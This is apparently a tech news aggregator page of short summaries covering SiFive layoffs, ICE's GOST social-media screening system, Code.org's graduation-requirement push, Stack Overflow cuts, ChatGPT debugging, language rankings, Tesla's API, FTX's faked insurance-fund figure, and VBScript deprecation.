An anonymous reader quotes a report from Tom's Hardware: SiFive, one of the key companies in the RISC-V ecosystem, is undergoing a significant restructuring marked by extensive layoffs and apparently a shift in business focus, reports More Than Moore. The company is seemingly retracting from its pre-designed core offerings, which means it may focus on custom cores instead. Meanwhile, the move casts uncertainty over SiFive's future in general along with its contributions to the RISC-V.

RISC-V has become quite a popular choice for making miniature low-cost cores, but there are several companies who are working on higher-performance RISC-V-based offerings. SiFive is one of such companies offering ready-to-use designs and also making custom cores based on what customers need. But now, SiFive has laid off somewhere between 100 to over 300 employees from around 700 in mid-October. Most of these were engineers, along with some sales and product personnel. Meanwhile, the company's leaders, including CEO Patrick Little, are still there.
SiFive issued the following statement to Tom's Hardware: "As we identify and focus on our greatest opportunities, SiFive is shifting to best meet our customers' fast-changing requirements by undergoing a strategic refocusing of all our global teams. Unfortunately, with this realignment, approximately 20% of employees across all different business groups and levels were impacted. The employees are receiving severance and outplacement assistance.

SiFive continues to be excited about the long-term opportunities for the company and for RISC-V. The growth of the company has never been stronger and the opportunities never better. We are well funded for years in the future and continue to work with the market leaders in every segment. We remain focused on our four product groups, essential, intelligence, performance and automotive, and as we explained in a press event earlier this month, have a robust roadmap to meet the needs of these markets. We see tremendous new opportunities in AI and with Consumer products like wearables and mobile as Google brings Android to the RISC-V ecosystem. We will continue to offer customization for specific customers, offering standard and custom products where it makes sense from a business standpoint."
Databases

ICE Uses Tool To Find 'Derogatory' Speech Online (404media.co) 63

An anonymous reader quotes a report from 404 Media: Immigration and Customs Enforcement (ICE) has used a system called Giant Oak Search Technology (GOST) to help the agency scrutinize social media posts, determine if they are "derogatory" to the U.S., and then use that information as part of immigration enforcement, according to a new cache of documents reviewed by 404 Media. The documents peel back the curtain on a powerful system, both in a technological and a policy sense -- how information is processed and used to decide who is allowed to remain in the country and who is not.

GOST's catchphrase included in one document is "We see the people behind the data." A GOST user guide included in the documents says GOST is "capable of providing behavioral based internet search capabilities." Screenshots show analysts can search the system with identifiers such as name, address, email address, and country of citizenship. After a search, GOST provides a "ranking" from zero to 100 on what it thinks is relevant to the user's specific mission. The documents further explain that an applicant's "potentially derogatory social media can be reviewed within the interface." After clicking on a specific person, analysts can review images collected from social media or elsewhere, and give them a "thumbs up" or "thumbs down." Analysts can also then review the target's social media profiles themselves too, and their "social graph," potentially showing who the system believes they are connected to.

DHS has used GOST since 2014, according to a page of the user guide. In turn, ICE has paid Giant Oak Inc., the company behind the system, in excess of $10 million since 2017, according to public procurement records. A Giant Oak and DHS contract ended in August 2022, according to the records. Records also show Customs and Border Protection (CBP), the Drug Enforcement Administration (DEA), the State Department, the Air Force, and the Bureau of the Fiscal Service which is part of the U.S. Treasury have all paid for Giant Oak services over the last nearly ten years. The FOIA documents specifically discuss Giant Oak's use as part of an earlier 2016 pilot called the "HSI [Homeland Security Investigations] PATRIOT Social Media Pilot Program." For this, the program would "target potential overstay violators from particular visa issuance Posts located in countries of concern."
"The government should not be using algorithms to scrutinize our social media posts and decide which of us is 'risky.' And agencies certainly shouldn't be buying this kind of black box technology in secret without any accountability. DHS needs to explain to the public how its systems determine whether someone is a 'risk' or not, and what happens to the people whose online posts are flagged by its algorithms," Patrick Toomey, Deputy Director of the ACLU's National Security Project, told 404 Media in an email. The documents come from a Freedom of Information Act (FOIA) lawsuit brought by both the ACLU and the ACLU of Northern California. Toomey from the ACLU then shared the documents with 404 Media.
Education

Code.org Presses Washington To Make Computer Science a High School Graduation Requirement 95

theodp writes: In July, Seattle-based and tech-backed nonprofit Code.org announced its 10th policy recommendation for all states "to require all students to take computer science (CS) to earn a high school diploma." In August, Washington State Senator Lisa Wellman phoned-in her plans to introduce a bill to make computer science a Washington high school graduation requirement to the state's Board of Education, indicating that the ChatGPT-sparked AI craze and Code.org had helped convince her of the need. Wellman, a former teacher who worked as a Programmer/System Analyst in the 80's before becoming an Apple VP (Publishing) in the '90s, also indicated that exposure to CS given to students in fifth grade could be sufficient to satisfy a HS CS requirement. In 2019, Wellman sponsored Microsoft-supported SB 5088 (Bill details), which required all Washington state public high schools to offer a CS class. Wellman also sponsored SB 5299 in 2021, which allows high school students to take a computer science elective in place of a third year math or science course (that may be required for college admission) to count towards graduation requirements.

And in October, Code.org CEO Hadi Partovi appeared before the Washington State Board of Education, driving home points Senator Wellman made in August with a deck containing slides calling for Washington to "require that all students take computer science to earn a high school diploma" and to "require computer science within all teacher certifications." Like Wellman, Partovi suggested the CS high school requirement might be satisfied by middle school work (he alternatively suggested one year of foreign language could be dropped to accommodate a HS CS course). Partovi noted that Washington contained some of the biggest promoters of K-12 CS in Microsoft Philanthropies' TEALS (TEALS founder Kevin Wang is a member of the Washington State Board of Education) and Code.org, as well some of the biggest funders of K-12 CS in Amazon and Microsoft -- both which are $3,000,000+ Platinum Supporters of Code.org and have top execs on Code.org's Board of Directors.
Businesses

Stack Overflow Cuts 28% Workforce as the AI Coding Boom Continues 36

Coding help forum Stack Overflow is laying off 28 percent of its staff as it struggles toward profitability. From a report: CEO Prashanth Chandrasekar announced today that the company is "significantly reducing the size of our go-to-market organization," as well as "supporting teams" and other groups. After the team doubled its employee base last year, Chandrasekar told The Verge's Nilay Patel in an interview that about 45 percent of those hires were for its go-to-market sales team, which he said was "obviously the largest team." Prosus acquired Stack Overflow in a $1.8 billion deal in mid-2021.
Programming

'OK, So ChatGPT Just Debugged My Code. For Real' (zdnet.com) 174

ZDNet's senior contributing editor also maintains software, and recently tested ChatGPT on two fixes for bugs reported by users, and a new piece of code to add a new feature. It's a "real-world" coding test, "about pulling another customer support ticket off the stack and working through what made the user's experience go south." First...

please rewrite the following code to change it from allowing only integers to allowing dollars and cents (in other words, a decimal point and up to two digits after the decimal point). ChatGPT responded by explaining a two-step fix, posting the modified code, and then explaining the changes. "I dropped ChatGPT's code into my function, and it worked. Instead of about two-to-four hours of hair-pulling, it took about five minutes to come up with the prompt and get an answer from ChatGPT." Next up was reformatting an array. I like doing array code, but it's also tedious. So, I once again tried ChatGPT. This time the result was a total failure. By the time I was done, I probably fed it 10 different prompts. Some responses looked promising, but when I tried to run the code, it errored out. Some code crashed; some code generated error codes. And some code ran, but didn't do what I wanted. After about an hour, I gave up and went back to my normal technique of digging through GitHub and StackExchange to see if there were any examples of what I was trying to do, and then writing my own code.
Then he posted the code for a function handling a WordPress filter, along with the question: "I get the following error. Why?" Within seconds, ChatGPT responded... Just as it suggested, I updated the fourth parameter of the add_filter() function to 2, and it worked!

ChatGPT took segments of code, analyzed those segments, and provided me with a diagnosis. To be clear, in order for it to make its recommendation, it needed to understand the internals of how WordPress handles hooks (that's what the add_filter function does), and how that functionality translates to the behavior of the calling and the execution of lines of code. I have to mark that achievement as incredible — undeniably 'living in the future' incredible...

As a test, I also tried asking ChatGPT to diagnose my problem in a prompt where I didn't include the handler line, and it wasn't able to help. So, there are very definite limitations to what ChatGPT can do for debugging right now, in 2023...

Could I have fixed the bug on my own? Of course. I've never had a bug I couldn't fix. But whether it would have taken two hours or two days (plus pizza, profanity, and lots of caffeine), while enduring many interruptions, that's something I don't know. I can tell you ChatGPT fixed it in minutes, saving me untold time and frustration.

The article does include a warning. "AI is essentially a black box, you're not able to see what process the AI undertakes to come to its conclusions. As such, you're not really able to check its work... If it turns out there is a problem in the AI-generated code, the cost and time it takes to fix may prove to be far greater than if a human coder had done the full task by hand."

But it also ends with this prediction. "I see a very interesting future, where it will be possible to feed ChatGPT all 153,000 lines of code and ask it to tell you what to fix... I can definitely see a future where programmers can simply ask ChatGPT (or a Microsoft-branded equivalent) to find and fix bugs in entire projects."
Java

C# Challenges Java in Programming Language Popularity (infoworld.com) 109

"The gap between C# and Java never has been so small," according to October's update for TIOBE's "Programming Community Index".

"Currently, the difference is only 1.2%, and if the trends remain this way, C# will surpass Java in about 2 months' time." Java shows the largest decline of -3.92% and C# the largest gain of +3.29% of all programming languages (annually).

The two languages have always been used in similar domains and thus have been competitors for more than 2 decades now. Java's decline in popularity is mainly caused by Oracle's decision to introduce a paid license model after Java 8. Microsoft took the opposite approach with C#. In the past, C# could only be used as part of commercial tool Visual Studio. Nowadays, C# is free and open source and it's embraced by many developers.

There are also other reasons for Java's decline. First of all, the Java language definition has not changed much the past few years and Kotlin, its fully compatible direct competitor, is easier to use and free of charge.

"Java remains a critical language in enterprise computing," argues InfoWorld, "with Java 21 just released last month and Java 22 due next March. And free open source binaries of Java still are available via OpenJDK." InfoWorld also notes TIOBE's ranking is different than other indexes. TIOBE's top 10:
  1. Python (14.82%)
  2. C (12.08%)
  3. C++ (10.67%)
  4. Java (8.92%)
  5. C# (7.71%)
  6. JavaScript (2.91%)
  7. Visual Basic (2.13%)
  8. PHP (1.9%)
  9. SQL (1.78%)
  10. Assembly (1.64%)

And here's the PYPL Popularity of Programming Language (based on searches for language tutorials on Google):

  1. Python, with a 28.05% share
  2. Java (15.88%)
  3. JavaScript (9.27%)
  4. C# (6.79%)
  5. C/C++ (6.59%)
  6. PHP (4.86%)
  7. R (4.45%)
  8. TypeScript (2.93%)
  9. Swift (2.69%)
  10. Objective-C (2.29%)

Transportation

Tesla Releases Official API Documentation To Support Third-Party Apps (electrek.co) 7

An anonymous reader quotes a report from Electrek: Tesla has officially released its API documentation to support third-party apps -- after years of operating in a gray zone with an unofficial API. For now, it is geared toward fleet management, but developers are hoping it is a first step toward creating a healthy app ecosystem. [...] So far, it still only covers the command that you can send to your car through the Tesla app, and it can ping the data from your car that goes to the app. In short, it is going to make official all the third-party fleet management apps, smartwatch integration apps, etc.

In the documentation, Tesla writes that all third-party apps are going to have to go through the new API starting next year: "Following the release of Tesla Vehicle Command SDK support for REST API vehicle command endpoints is now reaching end of life. Starting 2024 most vehicles will require sending commands via Tesla Vehicle Command SDK." Tesla put together a process to onboard those apps on its website. If you are using some of those apps, you will likely receive a notification to give them official authorization to access car data.

Bitcoin

FTX Used Python Code To Fake Its Insurance Fund Figure (cointelegraph.com) 104

Tom Mitchelhill reports via CoinTelegraph: Crypto exchange FTX used hidden Python code to misrepresent the value of its insurance fund -- a pool of funds meant to prevent user losses during huge liquidation events -- according to testimony from FTX co-founder Gary Wang. In a damning testimony on Oct. 6, FTX's former chief technology officer, Gary Wang, said that FTX's so-called $100 million insurance fund in 2021 was fabricated and never contained any of the exchange's FTX tokens (FTT) as claimed. Instead, the figure shown to the public was calculated by multiplying the daily trading volume of the FTX Token by a random number close to 7,500.

When the prosecution surfaced the above tweet -- among other public statements of its value -- and asked Wang whether this amount was accurate, he replied with a single word: "No." "For one, there is no FTT in the insurance fund. It's just the USD number. And, two, the number listed here does not match what was in the database." An exhibit in the Oct. 6 trial shows the alleged code used to generate the size of the so-called "Backstop Fund" or public insurance fund.

FTX's insurance fund was designed to protect user losses in case of huge, sudden market movements and its value was often touted on its website and social media. According to Wang's testimony, however, the amount contained within the fund was often insufficient to cover these losses. [...] In addition to revealing the allegedly fraudulent nature of FTX's insurance fund, Wang claimed that Bankman-Fried prompted him and Nishad Singh to implement an "allow_negative" balance feature in the code at FTX, which allowed Alameda Research to trade with near-unlimited liquidity on the crypto exchange.

Programming

Man Trains Home Cameras To Help Repel Badgers and Foxes (bbc.co.uk) 77

Tom Singleton reports via the BBC: A man got so fed up with foxes and badgers fouling in his garden that he adapted cameras to help repel them. James Milward linked the Ring cameras at his Surrey home to a device that emits high frequency sounds. He then trained the system using hundreds of images of the nocturnal nuisances so it learned to trigger the noise when it spotted them. Mr Milward said it "sounds crazy" but the gadget he called the Furbinator 3000 has kept his garden clean.

Getting the camera system to understand what it was looking at was not straightforward though. "At first it recognised the badger as an umbrella," he said. "I did some fine tuning and it came out as a sink, or a bear if I was lucky. Pretty much a spectacular failure." He fed in pictures of the animals through an artificial intelligence process called machine learning and finally, the device worked. The camera spotted a badger, and the high frequency sound went off to send the unwanted night-time visitor on its way and leave the garden clean for Mr Milward's children to play in.
The code for the Furbinator 3000 is open source, with detailed instructions available in Milward's Medium post.
Microsoft

Microsoft Says VBScript Will Be Ripped From Windows In a Future Release (theregister.com) 79

Thomas Claburn reports via The Register: Microsoft has stopped developing VBScript after a 27-year relationship and plans to remove the scripting language entirely in a future Windows release. The Windows biz said on Monday that VBScript, short for Visual Basic Scripting Edition, has been deprecated in an update to its list of "Deprecated features for Windows client." "VBScript is being deprecated," Microsoft said. "In future releases of Windows, VBScript will be available as a feature on demand before its removal from the operating system."

VBScript debuted in 1996 and its most recent release, version 5.8, dates back to 2010. It is a scripting language, and was for a while widely used among system administrators to automate tasks until it was eclipsed by PowerShell, which debuted in 2006. "Microsoft Visual Basic Scripting Edition brings active scripting to a wide variety of environments, including Web client scripting in Microsoft Internet Explorer and Web server scripting in Microsoft Internet Information Service," Redmond explains in its help documentation. Unfortunately, Microsoft never managed to get other browser makers to support VBScript, so outside of Microsoft-exclusive environments, web developers tended to favor JavaScript for client-side tasks.
